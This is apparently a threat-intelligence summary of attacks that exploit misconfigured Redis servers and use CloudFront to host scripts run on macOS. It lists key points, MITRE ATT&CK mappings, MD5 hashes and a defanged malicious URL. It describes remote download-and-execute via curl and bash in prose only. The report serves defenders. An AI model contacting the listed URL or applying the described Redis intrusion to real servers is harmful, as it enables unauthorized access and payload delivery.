This article examines two scenarios wherein attackers exploit misconfigured Redis servers and utilize cloud storage resources to execute malicious scripts and gain unauthorized access. The sophisticated techniques employed emphasize the necessity for proactive defensive measures. Affected: Redis servers, macOS systems
Keypoints :
- Attackers exploit misconfigurations in Redis services to execute remote commands.
- Utilization of “living off the land” attacks is highlighted, using existing tools like curl and bash.
- Exposed Redis servers are highly vulnerable to unauthorized access when not correctly configured.
- Downloading and executing scripts from remote sources is a common red flag for malicious activity.
- Network connections from commands indicate potential backdoor installations or data exfiltration.
- Cloud-based resources like CloudFront can be misused by attackers for hosting malicious payloads.
- Analyzing command history and network activity is critical for identifying indicators of compromise.
MITRE Techniques :
- Tactic: Execution; Technique: Command and Scripting Interpreter (T1059); Procedure: Utilize curl to download and execute scripts.
- Tactic: Execution; Technique: Application Layer Protocol (T1071); Procedure: Use HTTP to communicate with remote servers for malicious payload retrieval.
- Tactic: Initial Access; Technique: Exploit Public-Facing Application (T1190); Procedure: Exploit misconfigured Redis services.
Indicator of Compromise :
- MD5 Parent Process MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec
- MD5 Grandparent MD5: ab47aa51b678216bc998fe7e5fe7aefd
- MD5 Parent MD5: 95d23ed8b5448779eee9863d2bc5c1ba
- MD5 Child MD5: 0846e04c22488b04222817529f235024
- URL: hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1